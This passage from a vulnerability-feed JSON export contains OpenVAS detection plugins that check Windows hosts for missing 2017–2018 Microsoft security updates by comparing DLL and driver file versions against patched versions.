"CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11918", "CVE-2017-11899", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11910", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812334", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812334", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4053581)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812334\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11907\", \"CVE-2017-11910\", \"CVE-2017-11912\",\n \"CVE-2017-11886\", \"CVE-2017-11887\", \"CVE-2017-11888\", \"CVE-2017-11889\",\n \"CVE-2017-11890\", \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11899\",\n \"CVE-2017-11901\", \"CVE-2017-11903\", \"CVE-2017-11906\", \"CVE-2017-11913\",\n \"CVE-2017-11918\", \"CVE-2017-11919\", \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102045, 102086, 102092, 102062, 102063, 102065, 102080,\n 102082, 102053, 102054, 102077, 102046, 102047, 102078, 102091,\n 102089, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 10:08:48 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4053581)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4053581\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error when Internet Explorer improperly handles objects in 
memory.\n\n - An error when the Windows its:// protocol handler unnecessarily sends traffic\n to a remote site in order to determine the zone of a provided URL.\n\n - An error when Microsoft Edge improperly accesses objects in memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - A security feature bypass exists when Device Guard incorrectly validates an\n untrusted file.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain the same user rights as the current user, obtain\n sensitive information to further compromise the user's system, a brute-force\n to disclose the NTLM hash password and make an unsigned file appear to be signed.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for x64-based Systems\n\n - Microsoft Windows 10 for 32-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4053581\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17708\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17708\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "description": "This host is missing a critical security\n update according to Microsoft KB4054519", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4054519)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310812244", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310812244", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4054519)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812244\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11886\", \"CVE-2017-11887\", \"CVE-2017-11890\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11901\", \"CVE-2017-11903\",\n \"CVE-2017-11906\", \"CVE-2017-11907\", \"CVE-2017-11912\", \"CVE-2017-11913\",\n \"CVE-2017-11919\", \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102062, 102063, 102082, 102053, 102054, 102046, 102047,\n 102078, 102045, 102092, 102091, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", 
value:\"2017-12-13 09:23:14 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4054519)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4054519\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Internet Explorer improperly handles objects in memory.\n\n - Scripting engine handles objects in memory in Microsoft browsers.\n\n - Windows its:// protocol handler unnecessarily sends traffic to a remote\n site in order to determine the zone of a provided URL.\n\n - Scripting engine does not properly handle objects in memory in Microsoft\n browsers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to execute code on the target\n system, gain the same user rights as the current user, obtain information to\n further compromise the user's system and could attempt a brute-force attack to\n disclose the password.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4054519\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18872\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.18872\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "description": "This host is missing a critical security\n update according to Microsoft KB4054518", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4054518)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11890", "CVE-2017-11885", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11927", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812245", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310812245", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4054518)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812245\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11885\", \"CVE-2017-11886\", \"CVE-2017-11887\", \"CVE-2017-11890\",\n \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11901\", \"CVE-2017-11903\",\n \"CVE-2017-11906\", \"CVE-2017-11907\", \"CVE-2017-11912\", \"CVE-2017-11913\",\n \"CVE-2017-11919\", \"CVE-2017-11927\", \"CVE-2017-11930\");\n script_bugtraq_id(102055, 102062, 102063, 102082, 102053, 102054, 102046, 102047,\n 102078, 102045, 102092, 102091, 102093, 102095, 102058);\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", 
value:\"2017-12-13 09:40:51 +0530 (Wed, 13 Dec 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4054518)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4054518\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - An error in RPC if the server has Routing and Remote Access enabled.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Internet Explorer improperly handles objects in memory.\n\n - Scripting engine handles objects in memory in Microsoft browsers.\n\n - Windows its:// protocol handler unnecessarily sends traffic to a remote site\n in order to determine the zone of a provided URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to execute code on the target\n system, gain the same user rights as the current user, obtain information to\n further compromise the user's system and could attempt a brute-force attack to\n disclose the password.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4054518\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23963\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.23963\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "description": "This host is missing a critical security\n update according to Microsoft security updates KB4052978.", "cvss3": {}, "published": "2017-12-13T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11912", "CVE-2017-11930", "CVE-2017-11903", "CVE-2017-11919", "CVE-2017-11913", "CVE-2017-11890", "CVE-2017-11887", "CVE-2017-11895", "CVE-2017-11907", "CVE-2017-11901", "CVE-2017-11894", "CVE-2017-11886", "CVE-2017-11906"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310812336", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310812336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812336\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11907\", \"CVE-2017-11912\", \"CVE-2017-11886\", \"CVE-2017-11887\",\n \"CVE-2017-11890\", \"CVE-2017-11894\", \"CVE-2017-11895\", \"CVE-2017-11901\",\n \"CVE-2017-11903\", \"CVE-2017-11906\", \"CVE-2017-11913\", \"CVE-2017-11919\",\n \"CVE-2017-11930\");\n script_bugtraq_id(102045, 102092, 102062, 102063, 102082, 102053, 102054, 102046,\n 102047, 102078, 102091, 102093, 102058);\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-12-13 
10:40:44 +0530 (Wed, 13 Dec 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4052978.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple errors in Internet Explorer which improperly accesses objects in\n memory.\n\n - Multiple errors when Internet Explorer improperly handles objects in memory.\n\n - Multiple errors exists in the way the scripting engine handles objects in\n memory in Microsoft browsers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code in the context of the current user, gain the same\n user rights as the current user and obtain sensitive information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x, 10.x and 11.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4052978\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2, win2012:1, win2012R2:1,\n win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^(9|10|11)\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\n##Server 2008\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21084\")){\n Vulnerable_range = \"Less than 9.0.8112.21084\";\n }\n}\n\n# Win 2012\nelse if(hotfix_check_sp(win2012:1) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"10.0.9200.22314\")){\n Vulnerable_range = \"Less than 10.0.9200.22314\";\n }\n}\n\nelse if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1, win7:2, win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"11.0.9600.18860\")){\n Vulnerable_range = \"Less than 11.0.9600.18860\";\n }\n}\n\nif(Vulnerable_range)\n{\n report = report_fixed_ver(file_checked:iePath + \"\\Mshtml.dll\",\n file_version:iedllVer, vulnerable_range:Vulnerable_range);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-06-08T23:06:06", "description": "This host is missing a critical security\n update according to Microsoft KB4103718", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-8174", "CVE-2018-8136", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-0955", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8124", "CVE-2018-8145", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-0886", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-8120", "CVE-2018-1025"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310813336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813336", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103718)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813336\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0959\", \"CVE-2018-1022\",\n \"CVE-2018-1025\", \"CVE-2018-8114\", \"CVE-2018-8120\", \"CVE-2018-8122\",\n \"CVE-2018-8124\", \"CVE-2018-8127\", \"CVE-2018-8136\", \"CVE-2018-8145\",\n \"CVE-2018-8164\", \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8174\",\n \"CVE-2018-8178\", \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2017-11927\",\n \"CVE-2018-0886\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 08:12:54 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103718)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103718\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Microsoft browsers improperly access objects in memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - Windows kernel fails to properly handle objects in memory.\n\n - The VBScript engine improperly handles objects in memory.\n\n - The scripting engine improperly handles objects in memory in Microsoft browsers.\n\n - Windows Common Log File System (CLFS) driver 
improperly handles objects in memory.\n\n - Chakra improperly discloses the contents of its memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Windows 'its://' protocol handler unnecessarily sends traffic to a remote site\n in order to determine the zone of a provided URL.\n\n - An error in Credential Security Support Provider protocol (CredSSP).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to gain the same user rights as the current user, run arbitrary\n code, disclose sensitive information and run processes in an elevated context\n and it may lead to further compromise of the system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4103718\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, 
test_version:\"6.1.7601.24117\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24117\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:07", "description": "This host is missing a critical security\n update according to Microsoft KB4103725", "cvss3": {}, "published": "2018-05-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4103725)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-0959", "CVE-2018-8174", "CVE-2018-8134", "CVE-2018-8136", "CVE-2018-0824", "CVE-2018-8164", "CVE-2018-8178", "CVE-2018-0955", "CVE-2018-0954", "CVE-2018-8127", "CVE-2018-8124", "CVE-2018-8145", "CVE-2018-8897", "CVE-2018-8122", "CVE-2018-8167", "CVE-2018-8166", "CVE-2017-11927", "CVE-2018-0886", "CVE-2018-1022", "CVE-2018-8114", "CVE-2018-1025"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310813338", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813338", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4103725)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813338\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-0954\", \"CVE-2018-0955\", \"CVE-2018-0959\", \"CVE-2018-1022\",\n \"CVE-2018-1025\", \"CVE-2018-8114\", \"CVE-2018-8122\", \"CVE-2018-8124\",\n \"CVE-2018-8127\", \"CVE-2018-8134\", \"CVE-2018-8136\", \"CVE-2018-8145\",\n \"CVE-2018-8164\", \"CVE-2018-8166\", \"CVE-2018-8167\", \"CVE-2018-8174\",\n \"CVE-2018-8178\", \"CVE-2018-8897\", \"CVE-2018-0824\", \"CVE-2018-0886\",\n \"CVE-2017-11927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-09 08:59:54 +0530 (Wed, 09 May 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4103725)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4103725\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", 